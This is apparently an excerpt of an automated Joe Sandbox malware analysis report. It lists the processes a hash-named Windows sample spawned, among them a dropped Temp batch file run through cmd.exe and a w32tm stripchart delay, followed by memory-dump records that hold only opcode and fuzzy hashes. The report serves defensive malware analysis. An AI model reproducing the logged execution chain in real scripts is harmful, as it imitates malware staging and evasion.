                                              Imagebase:0xfa0000
                                              File size:2'011'136 bytes
                                              MD5 hash:B8AA70ED9243F5AA9C8DD45E8B6C01E7
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:74
                                              Start time:14:17:09
                                              Start date:12/09/2024
                                              Path:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              Imagebase:0x250000
                                              File size:2'011'136 bytes
                                              MD5 hash:B8AA70ED9243F5AA9C8DD45E8B6C01E7
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:75
                                              Start time:14:17:09
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\1ke8OVZbVo.bat"
                                              Imagebase:0x7ff6fce80000
                                              File size:289'792 bytes
                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:76
                                              Start time:14:17:09
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff75da10000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:77
                                              Start time:14:17:13
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\chcp.com
                                              Wow64 process (32bit):false
                                              Commandline:chcp 65001
                                              Imagebase:0x7ff6ecd60000
                                              File size:14'848 bytes
                                              MD5 hash:33395C4732A49065EA72590B14B64F32
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:79
                                              Start time:14:17:18
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\w32tm.exe
                                              Wow64 process (32bit):false
                                              Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                              Imagebase:0x7ff6399d0000
                                              File size:108'032 bytes
                                              MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                                • Instruction ID: dedb7769f437952d8cbabe602aa4885dc903845d26322f73c79c1df940db4dda
                                                • Opcode Fuzzy Hash: 97fd133d6f95923d908deba08c492450252faabf2ec1148b244b5aefda93b66e
                                                • Instruction Fuzzy Hash: 1321CE4AA8F793C6F22953791C220BC5A80DF57321F58C6BAC74E870D2DD0CA84D52E2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 98c1dc81c41073742f812c0b918034116984ad8803ce23f010ce85647b237110
                                                • Instruction ID: 3d1297db1b121db8cba0d9f090e81e9939927ee35b6eb1ea11883f433907e8dc
                                                • Opcode Fuzzy Hash: 98c1dc81c41073742f812c0b918034116984ad8803ce23f010ce85647b237110
                                                • Instruction Fuzzy Hash: 6511C0C2D0E393C6F269577914261BC5A805F53631F9881BAD74E870C2DC0CA94F63F2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cd2ef675040df25de81df82f9aa1f08f0d9dc0f8966538ac935dd6d2044fb9bb
                                                • Instruction ID: a5fd9def377e8c8840a1f17988d790349434dc9b219f321785e9d28e5d2768b4
                                                • Opcode Fuzzy Hash: cd2ef675040df25de81df82f9aa1f08f0d9dc0f8966538ac935dd6d2044fb9bb
                                                • Instruction Fuzzy Hash: B3A19670519655CFEB49CF18C0D05B43BA1FF96310B6486BDD95ECB68ACA38E886CBD0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 183963f0d7affc36283294f2817c632062fa92359f14117d8cc59e3d209d81c4
                                                • Instruction ID: 6523558dead1fcb85450cebb81e185aa789344b3edfa0319139f824af70f5d19
                                                • Opcode Fuzzy Hash: 183963f0d7affc36283294f2817c632062fa92359f14117d8cc59e3d209d81c4
                                                • Instruction Fuzzy Hash: A511C192D1F383C6FA79437818251BC6AA09F43220F1CD2BAD64E874C2DD0DA84D63E3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 84c508ad46a44f6723c6841d644f93db32e104b5a027b03623c39eb7a0d5f4e3
                                                • Instruction ID: c8103f1acb3335dcad6c671be3db862b55c7622fb850c0ccfb5a17a6ec299aa7
                                                • Opcode Fuzzy Hash: 84c508ad46a44f6723c6841d644f93db32e104b5a027b03623c39eb7a0d5f4e3
                                                • Instruction Fuzzy Hash: 0311DA81E0F393C2FE28077518210BC5A609F83210F1CD17AD60F830C6DD0EA88863E2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 20351eb35d03f354526e766ac61992c0128a4956d259601139d17b2bfe047fa7
                                                • Instruction ID: 284c03529e9250dad6338e69369fcaa17d1a9e1208a8d2855d73ab886942a6bc
                                                • Opcode Fuzzy Hash: 20351eb35d03f354526e766ac61992c0128a4956d259601139d17b2bfe047fa7
                                                • Instruction Fuzzy Hash: 5981397191D742CBF3689B2895461B9B7E0EF42314F26853ED18FC3582DE29F80A87E1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f438159d49a9619c75a499b9aa5f6dc0b043951ad66ab4a71701c8a4ff6831c3
                                                • Instruction ID: 40b47938757d552c8b299360ea821b87a493ef085922dfab635f8ffbee5b2733
                                                • Opcode Fuzzy Hash: f438159d49a9619c75a499b9aa5f6dc0b043951ad66ab4a71701c8a4ff6831c3
                                                • Instruction Fuzzy Hash: 66815B7191FB868BF3295B3894455B977F0EF46310F24843ED58EC7182DE29F40983A1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0ab0046fe7b1da90009fd81d453510a1166f29c2a6e554ded5fb24f7b93db8ac
                                                • Instruction ID: 041bd9415a4f600d8da497713d04b9308ac8dfe881343246ce159cd99b72536d
                                                • Opcode Fuzzy Hash: 0ab0046fe7b1da90009fd81d453510a1166f29c2a6e554ded5fb24f7b93db8ac
                                                • Instruction Fuzzy Hash: 7C812571A0EB068FF3285B7C94465B977E1EF52310F15847ED98F83192DE29F80A87A1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fb59a0ed2c6f569c15d3ced33128c7c828c092efb57ae4a49c8da10e77f87150
                                                • Instruction ID: 7579445c521c369094e2cee8a36ba272ad5a2c5b6aa38861cd931e374d01d4df
                                                • Opcode Fuzzy Hash: fb59a0ed2c6f569c15d3ced33128c7c828c092efb57ae4a49c8da10e77f87150
                                                • Instruction Fuzzy Hash: 3F7114B190E649CBF768DF2984565BC37C0FF46320B1482B9D29EC35A2DE18E81E87D1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 28b23b326308ba247d5b7a9a29d5d3ec322928c9b685d2cc423a3dac796522ec
                                                • Instruction ID: 3a011867b74cace1cd2b7ab8072a686a77c3566b500c020caab6eec337073d5e
                                                • Opcode Fuzzy Hash: 28b23b326308ba247d5b7a9a29d5d3ec322928c9b685d2cc423a3dac796522ec
                                                • Instruction Fuzzy Hash: 1671143990E649CBF768DF288C165BC37D0EF4A310B1442B9D39EC75A6DE18E81E86D1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ddc79b23afc9ecb9bc922cbae607766bd922c8cd67394bbb736224da3e2a1039
                                                • Instruction ID: 6e355fccf7ea0138ab63df61362bc68a5aed218143907c8d489a1485c980f218
                                                • Opcode Fuzzy Hash: ddc79b23afc9ecb9bc922cbae607766bd922c8cd67394bbb736224da3e2a1039
                                                • Instruction Fuzzy Hash: 2771BF70D2D64ACEFB99DB74C8516FCBBA1FF56300F108579D10ED7192EA28A849C7A0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 46888d498aab58da6764445e1c22eba734aedae0239a241a9dca30917008dbbd
                                                • Instruction ID: f302796bfa6a93cc0892eeff67b7ad5da4e0f16cf7f614c94462dc4721660fc7
                                                • Opcode Fuzzy Hash: 46888d498aab58da6764445e1c22eba734aedae0239a241a9dca30917008dbbd
                                                • Instruction Fuzzy Hash: C171B07191D74ACFFB54DB74C854ABDBBA1EF4A300F10457AE10ED3181DF28A84A87A0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 12a8c420079e7a4cc120e30918d9ddcc18ffd0aea41f000bd522dbae01466e3b
                                                • Instruction ID: 85e1c339cf81fad48fd1aa0ac71839250de73f52f8f3b29dc394d608fed6aec7
                                                • Opcode Fuzzy Hash: 12a8c420079e7a4cc120e30918d9ddcc18ffd0aea41f000bd522dbae01466e3b
                                                • Instruction Fuzzy Hash: F261473150E649CFFB68DB3894165BCB7D4FF46320B0682B9D15EC75A2DA18E80E87D1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 373a923507e43e20a0809ae3129dbcee81762931eaa1bf43bd07f29177d1f649
                                                • Instruction ID: 3a417a704771d9142884df8fc05cea622e4159e2dc64873e783e28bc2057fcda
                                                • Opcode Fuzzy Hash: 373a923507e43e20a0809ae3129dbcee81762931eaa1bf43bd07f29177d1f649
                                                • Instruction Fuzzy Hash: 1271E37050DB46CFE749DB28D4916A8BBA0FF16300F5481B9D84EC7A86DB28F859C7D0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b54f42564f3ac7b5ca27ced14a255fb3c7db72b0ff08358587218b69803515d9
                                                • Instruction ID: 411ce53f9dd15420fbe48128a847332bd5f2aaccde1cd573a34314c287e3c0df
                                                • Opcode Fuzzy Hash: b54f42564f3ac7b5ca27ced14a255fb3c7db72b0ff08358587218b69803515d9
                                                • Instruction Fuzzy Hash: 6851F560D0C65ACFFB9C972884656FCB7A1FF56300F4481BDD14EC7186DE28AA8887D1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6176df749606d812128b8911199b4626c5fd4457e81b6183b1cf595477aafca6
                                                • Instruction ID: c3821148f55f78f47b3dfa37818588d2eb58f3704b274c234633a8b44ebf419c
                                                • Opcode Fuzzy Hash: 6176df749606d812128b8911199b4626c5fd4457e81b6183b1cf595477aafca6
                                                • Instruction Fuzzy Hash: 6051E430519682CBFB1ECF24C4A05797B61FF92311B1485BDD98F8B58BCE28E445CBA1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 43f910bbeab8134e7e6fb175f7266b563a03826681feefe78f80ba8ec9b6db10
                                                • Instruction ID: 691b49b609a3b98474ba15b02fbf50a23423d9a14d1bdf62a9e80e9dfb1fc0d8
                                                • Opcode Fuzzy Hash: 43f910bbeab8134e7e6fb175f7266b563a03826681feefe78f80ba8ec9b6db10
                                                • Instruction Fuzzy Hash: A551BDB0D1964ACFEB95DBB4C8559FCBBB1FF56300F1085BAD10EC7192DA24A849CB90
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1639655376.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacb20000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2306358cae29adc1059d3e9855aebbecbbf9dc751322b47539ed9c50c4dd5b14
                                                • Instruction ID: c46ecc477790b83d179f8a3de5167e901844c0867cf8abc2796442ddcf7ef3d6
                                                • Opcode Fuzzy Hash: 2306358cae29adc1059d3e9855aebbecbbf9dc751322b47539ed9c50c4dd5b14
                                                • Instruction Fuzzy Hash: 0C412BA6A0E5664AF705B3BDE0996FDBB40DF46325F0844BBD44DC61A3EE08A845C2C8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9d149f805744313a3628665badf1fb36fed5535681ad770bdb9950c827cccbfd
                                                • Instruction ID: 7a66aff66317b11bdb1996cc4a9d1a75ee22e9f277a2ed0e251758ce75bfa16e
                                                • Opcode Fuzzy Hash: 9d149f805744313a3628665badf1fb36fed5535681ad770bdb9950c827cccbfd
                                                • Instruction Fuzzy Hash: 2D41266091C65ACEFB69DB2884616B87BA1FFD6300F1481B9D14EC71C6CD38E9888B91
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1639655376.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacb20000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 309b0cb05432a74129826ce0c1025bcc9ff7016766a512227778470b64d0e6f1
                                                • Instruction ID: 33674855b26090de4f388f5aaef4cabf3358985c217e0d9711fc6cbd41f07d39
                                                • Opcode Fuzzy Hash: 309b0cb05432a74129826ce0c1025bcc9ff7016766a512227778470b64d0e6f1
                                                • Instruction Fuzzy Hash: 35310DA190D5654AF715B3BDA0996F9A781DF46324F1844BBD44DC61E3EE08A845C2C8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5da7ab5215a67b4c6da2f6041cf53dc3a4bbca164645a561680aca50c2f6520c
                                                • Instruction ID: d56a7444686941f35e10b6068c7c49ac11e70be88bcb0a1cf0f975d8a8904ab8
                                                • Opcode Fuzzy Hash: 5da7ab5215a67b4c6da2f6041cf53dc3a4bbca164645a561680aca50c2f6520c
                                                • Instruction Fuzzy Hash: CF416271A0CA09CFDF8CEB28C455DA9B7E1FF69320B144569E10EC3592DF21E855CB91
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 905001d37e551a7e9f6a82ee8bf7386d0a9e6320848f5262f3c6798fea57e059
                                                • Instruction ID: bab101379bbabdb56b4835cffb714c994cd9ab2dfadfbeaaa8b257cd57b823c1
                                                • Opcode Fuzzy Hash: 905001d37e551a7e9f6a82ee8bf7386d0a9e6320848f5262f3c6798fea57e059
                                                • Instruction Fuzzy Hash: A5416F7160CA088FDF89EB28C496DA8B7E1FB69311B14426AE10FC7192DF31E955CB91
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACF10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9149b0b0042a92b53648ae8881a86515763a5a2674699a77c7d2da0f563f0dce
                                                • Instruction ID: 3a262024f19f8fc2f9e704246a2ad425b9cce5e9c981eedb67aeb17b67ce8ed2
                                                • Opcode Fuzzy Hash: 9149b0b0042a92b53648ae8881a86515763a5a2674699a77c7d2da0f563f0dce
                                                • Instruction Fuzzy Hash: 26319171A0CA49CFDF8CEB28C055EA4B7E1FF69310B1405ADE40EC7192DE21E845CB92
Memory dump sources referenced by the function records below (each record names its source by offset):
• Offset 00007FFAACF10000: Source File 00000000.00000002.1711643958.00007FFAACF10000.00000040.00000800.00020000.00000000.sdmp, based on PE: false; Joe Sandbox IDA Plugin Snapshot File hcaresult_0_2_7ffaacf10000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
• Offset 00007FFAACB20000: Source File 00000000.00000002.1639655376.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, based on PE: false; Joe Sandbox IDA Plugin Snapshot File hcaresult_0_2_7ffaacb20000_4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.jbxd
Similarity fields (API ID, String ID, API String ID) are empty for every record in this range. Opcode ID and Opcode Fuzzy Hash are identical in every record and are given as one field.

Memory Dump Source: Offset 00007FFAACF10000
• Opcode ID / Opcode Fuzzy Hash: 8d288747ca87a380a10600654a946e73a4d52929c78d6e3b4a1d64d55218512c
• Instruction ID: dbac39d2dc28acb51e6ac5e3cfa0ee2485be20cea07942ae703f57daf818ae4d
• Instruction Fuzzy Hash: B0316F71608A488FDF8DEB28C095E74B7E1FF69311B1446AAE44EC7192DF30E895CB91

Memory Dump Source: Offset 00007FFAACF10000
• Opcode ID / Opcode Fuzzy Hash: 7cfe31e38062a7a6987d71e9f84ca40ab2f365093dfd349d3379a87b0d65e606
• Instruction ID: bd192e1615b1fb94016ad93208be17f53e962f190aa821a5043d945799f20d91
• Instruction Fuzzy Hash: FB318F7160CA09CFDF9CEB28C055EA4B7E1FF69310B1405A9E00EC7692DE25E885CB91

Memory Dump Source: Offset 00007FFAACF10000
• Opcode ID / Opcode Fuzzy Hash: 713c318c243060f4916ea7c97580bc147618d468b7039aed84e82cccd2f53244
• Instruction ID: 6c98c1a44c2f0b82e3a78a68d47957d92e036f5ed1f928a53a162fe047bf0d53
• Instruction Fuzzy Hash: 65317071608A09CFDF89EB28C095EB4B7E1FB69310B14466AE00FC7192DF34E895CB81

Memory Dump Source: Offset 00007FFAACB20000
• Opcode ID / Opcode Fuzzy Hash: 33592c7a7479b722f7b1e9978d6fe47f6cf614341ae1462db0232f63ecd05414
• Instruction ID: 472e3f2f87c0ed3eae9a88144dfd3cfb792a924f8f912aa47c63f5290e8c2ded
• Instruction Fuzzy Hash: FE213A60B1D9594FFB58A73CD45A67AB6C2EF99311F0440B9E40EC32E3ED19EC458284

Memory Dump Source: Offset 00007FFAACF10000
• Opcode ID / Opcode Fuzzy Hash: 5e6c2ae656c82d64bebdd32cd8ce9076d2f0f04e745b922a0c5339f338836057
• Instruction ID: 464122c5d025f04d8f283a88c01d205559cf25951f6ea3426efc3aa31e8f437d
• Instruction Fuzzy Hash: 0531353091AA4ACFEF98DB6484915BDB7B1FF56300F50807AE10ED3181DA39A9489BE1

Memory Dump Source: Offset 00007FFAACF10000
• Opcode ID / Opcode Fuzzy Hash: ba0d1712613b954dde67f383ef1299497ed6e87a7a748d3c4d2fa30ff7858254
• Instruction ID: 587eb85e26ae2642dd2f7a7c62787103b7ab191ef0f0a1be5a2379e2a0a474ab
• Instruction Fuzzy Hash: B6316D3091AA4ACFFB9CCB6485515BD77F0FF46300F5080BBD10EE3191DA39A9488B91

Memory Dump Source: Offset 00007FFAACB20000
• Opcode ID / Opcode Fuzzy Hash: ba44d7364815d69c285f3b05533ad2b963dd6be7d486d4f18cd4efefddf6e4a3
• Instruction ID: 574b383e23304b6960184054d1e5131a736ccddff4336008113ff1c140dc244a
• Instruction Fuzzy Hash: 3B214DA1A1D9664BF758737CA48EAF9A6C5DF46321F0444BAE40DC31E3ED0DAC4542C8

Memory Dump Source: Offset 00007FFAACF10000
• Opcode ID / Opcode Fuzzy Hash: 2a5afd8804fde011299e6787056f526de58b769e8d3a39562b4f2623b8a699e9
• Instruction ID: 59661f3f8337c1b5bd146c139a674c7bdcd9138518b7bd817a5cc1a6e29d1354
• Instruction Fuzzy Hash: A0312C1091D6E6CBFB1A832444605B87BA1EF43310B5886B9D18FCB4C7D41CE64983E1

Memory Dump Source: Offset 00007FFAACF10000
• Opcode ID / Opcode Fuzzy Hash: 2b532323d338ff19db7dc0a653961dd990777b8e6809366f67299b7e6c8abafe
• Instruction ID: 942cb7d51ec2a37166940fff60d80e69cb13dd15ae6f857d0a24d6f53a62bfa4
• Instruction Fuzzy Hash: F0210671A1E6898FFB44E77C94162FCBBA1FF5B310F184179D10EC76C2DA18A84A8390

Memory Dump Source: Offset 00007FFAACF10000
• Opcode ID / Opcode Fuzzy Hash: 72c8050d928ea0f0f0497a73b7991a339b5011a04da7ea25d50cc2ea8ac42852
• Instruction ID: fba3d834541e6d9ecbf31c3b4ed4d5bfabacd7a3b2a8cbeaaa227f58b84f6e9e
• Instruction Fuzzy Hash: 3021B661A1E64ACFFB54E77894266FCB7E1EF56310F14417AD10DC76C2EA28AC0A83D1

Memory Dump Source: Offset 00007FFAACF10000
• Opcode ID / Opcode Fuzzy Hash: c61950e1554e0d896947d3c110448c05e71bf187cf5fc96899f9491a31ff554c
• Instruction ID: 6b511e320ba15affedd26de1ff8f93d74da1405c16813aa08d10ce4acff6d3eb
• Instruction Fuzzy Hash: 6A21B470A1AA0EDFEB45EB6CC451ABCF3A1FF45350F10826AC15D87682DE24BD1A87C1

Memory Dump Source: Offset 00007FFAACF10000
• Opcode ID / Opcode Fuzzy Hash: 28defb2533647c93d16cfb2e1802a65b03f42eade706b2db23e1c9dd41e5786a
• Instruction ID: d064e4140fa4b6f2fae5fb603753e661c8db1dc073e88a91d17ae1945735b8b7
• Instruction Fuzzy Hash: C931E81091D6D6CAF71AC72844605B87F51EFD3310B1886B6D59ECB4DBCD18E84987E1

Memory Dump Source: Offset 00007FFAACF10000
• Opcode ID / Opcode Fuzzy Hash: bc60e588f068eb5062b7d32f3491a7ebb7dae4ea2f2fee43a9c4d29e05479b80
• Instruction ID: 3566dbb0781b254e7438cfe5f1e65cac701f8360c5572a15b64ec73affbd5e2a
• Instruction Fuzzy Hash: 78313A74A1991D8FEF9DDB28C855AACB7B1FF59300F4041AE910EE3291CA35A941CB80

Memory Dump Source: Offset 00007FFAACF10000
• Opcode ID / Opcode Fuzzy Hash: 12060365277f68304c8639800cc9857f22d272e0749275a7af77bde5057a843d
• Instruction ID: 574d715ecbb0ce543e0ae427e0cc1fd8022d551aeedfcd3073efa9fca1cc67b7
• Instruction Fuzzy Hash: 0E213E71A1991A9FEB58EB68D4919B8F7A2FF49300B148139D11EC3682DF24BC16CBC0

Memory Dump Source: Offset 00007FFAACF10000
• Opcode ID / Opcode Fuzzy Hash: dbeb2d71dd9e133624f81c49c1e6e6b4fbaa054c6aca8e82d25cd86d476abaa7
• Instruction ID: 1e96e2b2c53b783b94d1bc2408dfa5cac2a5d13b4d34dee005cce0a9a9a7dce3
• Instruction Fuzzy Hash: D731051091D697CAF72A87244478578BB91FF53310B2886BAD5BE8B4DBD81CE88983D1

Memory Dump Source: Offset 00007FFAACF10000
• Opcode ID / Opcode Fuzzy Hash: 7a4c4301b5e2c4bbd5e48a8ef306c33d7520fc1a87b0c9b1ca3f64cc4100fc15
